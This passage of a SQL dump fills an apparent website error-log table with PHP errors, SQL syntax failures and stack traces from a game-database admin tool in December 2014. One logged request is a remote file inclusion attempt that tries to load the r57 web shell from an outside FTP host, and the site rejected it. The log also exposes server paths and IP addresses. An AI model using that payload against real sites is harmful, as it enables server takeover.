user_nexus_menu_sub->html()\n#3 {main}', '37.24.148.242', 0.108, '2014-12-30 15:20:32', 'www.mojotrollz.eu', 80, '/web/mojotrollz/?page=user_nexus_menu_sub&menu=2&', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 11, b'0', 0, 9, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (810, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /api.php?call=files&cat=sys&id=system.js&_=1418953339539', '22d3f33b97373c2cb2462778ae37b686cabb7b8c', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 107, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '37.24.148.242', 0.004, '2014-12-19 02:42:30', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=sys&id=system.js&_=1418953339539', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (811, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /api.php?call=files&cat=sys&id=system.js&_=1418953349394', 'b9375f3a11359e6dc08c2b08786f4e512fac0c7a', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 107, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '37.24.148.242', 0.004, '2014-12-19 02:42:32', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=sys&id=system.js&_=1418953349394', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (812, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /api.php?call=files&cat=sys&id=system.js&_=1418953350403', '9a90664270d271b9828467d9f3ace3a409c7cb50', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 107, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '37.24.148.242', 0.012, '2014-12-19 02:42:35', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=sys&id=system.js&_=1418953350403', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (813, 'SYSTEM\\LOG\\ERROR', 'Call Command can only have letters! command: page; value: ftp://icsinformatique:icsinformatique@icsinformatique.com/www/r57.txt?', 'df94bd28a3911ec8ecd6790cf48db5d9a3aa2c29', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 196, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(49): SYSTEM\\API\\api::do_func_name(Array)\n#1 /home/mojotrolls/mojo_zero/src/web/index.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'page_mojotrollz\', Array, 1, false, true)\n#2 {main}', '142.4.222.207', 0.068, '2014-12-20 18:01:57', 'www.yeminy.org', 80, '/index.php?page=ftp://icsinformatique:icsinformatique@icsinformatique.com/www/r57.txt?', 'a:0:{}', '', 'Mozilla/3.0 (compatible; Indy Library)', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (816, 'SYSTEM\\LOG\\ERROR', 'Could not query Database. Check ur Query Syntax or required Rights: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'% OR `Name` LIKE % OR `Subname` LIKE %) LIMIT 100\' at line 4', '82e65efd3ccd131a8a49bdc5fe3058b4c0d4f4ec', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 49, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(43): SYSTEM\\DB\\ConnectionMYS->query(\'SELECT creature...\')\n#1 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_creature/saimod_mojotrollz_db_creature.php(74): SYSTEM\\DB\\Connection->query(\'SELECT creature...\')\n#2 [internal function]: saimod_mojotrollz_db_creature::sai_mod_saimod_mojotrollz_db_creature()\n#3 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#4 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#5 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#6 {main}', '37.24.148.242', 0.032, '2014-12-21 21:45:18', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (817, 'SYSTEM\\LOG\\ERROR', 'Could not query Database. Check ur Query Syntax or required Rights: Table \'host_mojotrollz.creature_template\' doesn\'t exist', '15402cba21afa67de7e465f892954eb0bbb1f7f3', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 49, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(43): SYSTEM\\DB\\ConnectionMYS->query(\'SELECT creature...\')\n#1 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_creature/saimod_mojotrollz_db_creature.php(74): SYSTEM\\DB\\Connection->query(\'SELECT creature...\')\n#2 [internal function]: saimod_mojotrollz_db_creature::sai_mod_saimod_mojotrollz_db_creature()\n#3 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#4 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#5 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#6 {main}', '37.24.148.242', 0.048, '2014-12-21 21:45:39', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (818, 'SYSTEM\\LOG\\ERROR', 'Could not query Database. Check ur Query Syntax or required Rights: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'AND (`Entry` LIKE "%%" OR `Name` LIKE "%%" OR `Subname` LIKE "%%") LIMIT 100\' at line 1', 'ebf4e76efe7655b8fdbafeee139b2b4757f0c7f6', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 49, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(43): SYSTEM\\DB\\ConnectionMYS->query(\'SELECT creature...\')\n#1 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_creature/saimod_mojotrollz_db_creature.php(81): SYSTEM\\DB\\Connection->query(\'SELECT creature...\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_creature/saimod_mojotrollz_db_creature.php(4): saimod_mojotrollz_db_creature::sai_mod_saimod_mojotrollz_db_creature(\'%%\', \'[null,"-1","-1"...\')\n#3 [internal function]: saimod_mojotrollz_db_creature::sai_mod_saimod_mojotrollz_db_creature_action_search(\'\', \'[null,"-1","-1"...\')\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#6 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#7 {main}', '37.24.148.242', 0.036, '2014-12-21 21:51:26', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature&action=search&search=&tags=[null,%22-1%22,%22-1%22,%22-1%22,%22-1%22,null,null,null,null,null,%22-1%22,%22-1%22]', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (819, 'SYSTEM\\LOG\\ERROR', 'Prepared Statement prepare fail: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'AND (`Entry` LIKE ? OR `Name` LIKE ? OR `Subname` LIKE ?) LIMIT 100\' at line 1', '08a3f9c31589d1586958cb8b00759c667cd97102', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 27, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(35): SYSTEM\\DB\\ConnectionMYS->prepare(\'search-creature\', \'SELECT creature...\', Array)\n#1 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_creature/saimod_mojotrollz_db_creature.php(83): SYSTEM\\DB\\Connection->prepare(\'search-creature\', \'SELECT creature...\', Array)\n#2 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_creature/saimod_mojotrollz_db_creature.php(4): saimod_mojotrollz_db_creature::sai_mod_saimod_mojotrollz_db_creature(\'%%\', \'[null,"-1","-1"...\')\n#3 [internal function]: saimod_mojotrollz_db_creature::sai_mod_saimod_mojotrollz_db_creature_action_search(\'\', \'[null,"-1","-1"...\')\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#6 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#7 {main}', '37.24.148.242', 0.036, '2014-12-21 21:53:22', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature&action=search&search=&tags=[null,%22-1%22,%22-1%22,%22-1%22,%22-1%22,null,null,null,null,null,%22-1%22,%22-1%22]', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (820, 'SYSTEM\\LOG\\ERROR', 'Prepared Statement prepare fail: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'AND t5.`table` = 1 AND t5.`type` = 5 AND t5.value = AND t6.`table` = 1 AND t6.`\' at line 1', 'f695887b7c81bebf2d9c955b080c8a19f3cb85b8', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 27, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(35): SYSTEM\\DB\\ConnectionMYS->prepare(\'search-creature\', \'SELECT creature...\', Array)\n#1 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_creature/saimod_mojotrollz_db_creature.php(87): SYSTEM\\DB\\Connection->prepare(\'search-creature\', \'SELECT creature...\', Array)\n#2 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_creature/saimod_mojotrollz_db_creature.php(4): saimod_mojotrollz_db_creature::sai_mod_saimod_mojotrollz_db_creature(\'%%\', \'[null,"-1","-1"...\')\n#3 [internal function]: saimod_mojotrollz_db_creature::sai_mod_saimod_mojotrollz_db_creature_action_search(\'\', \'[null,"-1","-1"...\')\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#6 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#7 {main}', '37.24.148.242', 0.036, '2014-12-21 22:46:27', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature&action=search&search=&tags=[null,%22-1%22,%22-1%22,%22-1%22,%22-1%22,null,null,null,null,null,%22-1%22,%22-1%22]', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 8, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (821, 'SYSTEM\\LOG\\ERROR', 'Prepared Statement prepare fail: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'AND t1.`table` = 1 AND t1.`type` = 1 AND t1.value = 1 AND t5.`table` = 1 AND t5.\' at line 1', 'a0f7f89a770dd41ab4c8ffb0a42a1ea83d640de1', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 27, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(35): SYSTEM\\DB\\ConnectionMYS->prepare(\'search-creature\', \'SELECT creature...\', Array)\n#1 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_creature/saimod_mojotrollz_db_creature.php(88): SYSTEM\\DB\\Connection->prepare(\'search-creature\', \'SELECT creature...\', Array)\n#2 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_creature/saimod_mojotrollz_db_creature.php(4): saimod_mojotrollz_db_creature::sai_mod_saimod_mojotrollz_db_creature(\'%%\', \'[null,"1","-1",...\')\n#3 [internal function]: saimod_mojotrollz_db_creature::sai_mod_saimod_mojotrollz_db_creature_action_search(\'\', \'[null,"1","-1",...\')\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#6 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#7 {main}', '37.24.148.242', 0.036, '2014-12-21 22:35:40', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature&action=search&search=&tags=[null,%221%22,%22-1%22,%22-1%22,%22-1%22,null,null,null,null,null,%22-1%22,%22-1%22]', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (822, 'SYSTEM\\LOG\\ERROR', 'Prepared Statement prepare fail: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'WHERE entry NOT IN (SELECT id FROM host_mojotrollz.mojotrollz_tags WHERE `table`\' at line 1', 'c15eff07e68b159e0079de90386a7da28b932031', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 27, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(35): SYSTEM\\DB\\ConnectionMYS->prepare(\'search-creature\', \'SELECT creature...\', Array)\n#1 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_creature/saimod_mojotrollz_db_creature.php(93): SYSTEM\\DB\\Connection->prepare(\'search-creature\', \'SELECT creature...\', Array)\n#2 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_creature/saimod_mojotrollz_db_creature.php(4): saimod_mojotrollz_db_creature::sai_mod_saimod_mojotrollz_db_creature(\'%\', \'{"1":"-2","2":"...\')\n#3 [internal function]: saimod_mojotrollz_db_creature::sai_mod_saimod_mojotrollz_db_creature_action_search(\'%\', \'{"1":"-2","2":"...\')\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#6 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#7 {main}', '37.24.148.242', 0.048, '2014-12-21 23:06:57', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature&action=search&search=%&tags={%221%22:%22-2%22,%222%22:%22-1%22,%223%22:%22-1%22,%224%22:%22-1%22,%2210%22:%22-1%22,%2211%22:%22-1%22}', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (823, 'SYSTEM\\LOG\\ERROR', 'Prepared Statement prepare fail: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'(`Entry` LIKE ? OR `Name` LIKE ? OR `Subname` LIKE ?) LIMIT 100\' at line 1', '625453d8c8d44c594ad01527999196ac26868e2c', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 27, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(35): SYSTEM\\DB\\ConnectionMYS->prepare(\'search-creature\', \'SELECT creature...\', Array)\n#1 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_creature/saimod_mojotrollz_db_creature.php(93): SYSTEM\\DB\\Connection->prepare(\'search-creature\', \'SELECT creature...\', Array)\n#2 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_creature/saimod_mojotrollz_db_creature.php(4): saimod_mojotrollz_db_creature::sai_mod_saimod_mojotrollz_db_creature(\'%\', \'{"1":"-2","2":"...\')\n#3 [internal function]: saimod_mojotrollz_db_creature::sai_mod_saimod_mojotrollz_db_creature_action_search(\'%\', \'{"1":"-2","2":"...\')\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#6 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#7 {main}', '37.24.148.242', 0.056, '2014-12-21 23:07:22', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature&action=search&search=%&tags={%221%22:%22-2%22,%222%22:%22-1%22,%223%22:%22-1%22,%224%22:%22-1%22,%2210%22:%22-1%22,%2211%22:%22-1%22}', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (824, 'SYSTEM\\LOG\\ERROR', 'Parameter type missmacht or Missing Verifier. Param: id Verifier: UINT', '83b6926ab2723e5eaa26e77364105142c4fa81e1', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 183, '#0 /home/web/webdir/mojotrollz/system/api/api.php(43): SYSTEM\\API\\api::do_parameters_opt(Array, Array, 5300, \'creature\', \'\\\\SYSTEM\\\\API\\\\ver...\')\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.242', 0.012, '2014-12-21 23:09:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature&action=creature&id=undefined', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (826, 'SYSTEM\\LOG\\ERROR', 'Prepared Statement prepare fail: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'.id\n WHERE table = ? and id = ?\' at line 3', '81c89d61c40bb3194ed5b0bdb403d1dcaa429a0b', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 27, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(35): SYSTEM\\DB\\ConnectionMYS->prepare(\'DBD\\\\TAGS_GET\', \'SELECT * FROM m...\', Array)\n#1 /home/web/webdir/mojotrollz/system/db/qq/QP.php(14): SYSTEM\\DB\\Connection->prepare(\'DBD\\\\TAGS_GET\', \'SELECT * FROM m...\', Array)\n#2 /home/web/webdir/mojotrollz/mojotrollz/api/database/tags/tags.php(14): SYSTEM\\DB\\QP::QQ(Array)\n#3 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_creature/saimod_mojotrollz_db_creature.php(28): tags::get(1, 1)\n#4 [internal function]: saimod_mojotrollz_db_creature::sai_mod_saimod_mojotrollz_db_creature_action_creature(\'1\')\n#5 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#6 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#7 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#8 {main}', '37.24.148.242', 0.024, '2014-12-21 23:20:27', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature&action=creature&id=1', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (827, 'SYSTEM\\LOG\\ERROR', 'Prepared Statement prepare fail: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'.id WHERE table = ? AND id = ?\' at line 1', 'ed6fd80d2aba9e1313ad0a736c4be14a7926b464', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 27, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(35): SYSTEM\\DB\\ConnectionMYS->prepare(\'DBD\\\\TAGS_GET\', \'SELECT * FROM m...\', Array)\n#1 /home/web/webdir/mojotrollz/system/db/qq/QP.php(14): SYSTEM\\DB\\Connection->prepare(\'DBD\\\\TAGS_GET\', \'SELECT * FROM m...\', Array)\n#2 /home/web/webdir/mojotrollz/mojotrollz/api/database/tags/tags.php(14): SYSTEM\\DB\\QP::QQ(Array)\n#3 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_creature/saimod_mojotrollz_db_creature.php(28): tags::get(1, 1)\n#4 [internal function]: saimod_mojotrollz_db_creature::sai_mod_saimod_mojotrollz_db_creature_action_creature(\'1\')\n#5 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#6 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#7 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#8 {main}', '37.24.148.242', 0.024, '2014-12-21 23:21:10', 'www.mojotrollz.eu', 80, 